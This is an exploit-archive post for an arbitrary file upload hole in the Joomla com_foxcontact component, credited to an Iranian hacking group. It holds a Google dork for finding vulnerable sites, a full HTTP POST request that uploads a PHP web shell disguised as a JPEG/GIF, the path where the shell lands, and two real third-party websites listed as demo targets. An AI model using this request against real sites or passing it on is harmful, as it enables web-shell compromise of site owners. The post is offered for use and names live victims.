Home / exploits Joomla Component com_foxcontact Arbitrary File Upload shell Vulnerability
Posted on 30 November -0001
<HTML><HEAD><TITLE>Joomla Component com_foxcontact Arbitrary File Upload shell Vulnerability</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>########################## # Exploit Title: Joomla Component Arbitrary File Upload shell Vulnerability # Dork Google: allinurl:index.php?option=com_foxcontact # We Are Iranian Anonymous # Home: Iranonymous.org # Discovered By: Hacker Khan # vendor Home: http://www.fox.ra.it/ # Version: 1.0 # Tested on : Linux-Windows7 ########################## # Exploit -HTTP Header Example- POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1 Host: www.cavedegruissan.com User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest X-File-Name: shell.php Content-Type: image/jpeg Connection: keep-alive Pragma: no-cache Cache-Control: no-cache GIF89a<?php shell ?> ############################ Shell path: www.site.com/components/com_foxcontact/uploads/filename.php ########################### Demo : http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131 http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113 ############################## #Thanks to : MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran ||Ormazd <a class="__cf_email__" href="/cdn-cgi/l/email-protection" data-cfemail="5b272708331b3f6b2c">[email protected]</a><script data-cfhash='f9e31' type="text/javascript">/* <![CDATA[ */!function(t,e,r,n,c,a,p){try{t=document.currentScript||function(){for(t=document.getElementsByTagName('script'),e=t.length;e--;)if(t[e].getAttribute('data-cfhash'))return t[e]}();if(t&&(c=t.previousSibling)){p=t.parentNode;if(a=c.getAttribute('data-cfemail')){for(e='',r='0x'+a.substr(0,2)|0,n=2;a.length-n;n+=2)e+='%'+('0'+('0x'+a.substr(n,2)^r).toString(16)).slice(-2);p.replaceChild(document.createTextNode(decodeURIComponent(e)),c)}p.removeChild(t)}}catch(u){}}()/* ]]> */</script> || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous . # Discovered By: Hacker Khan </BODY></HTML>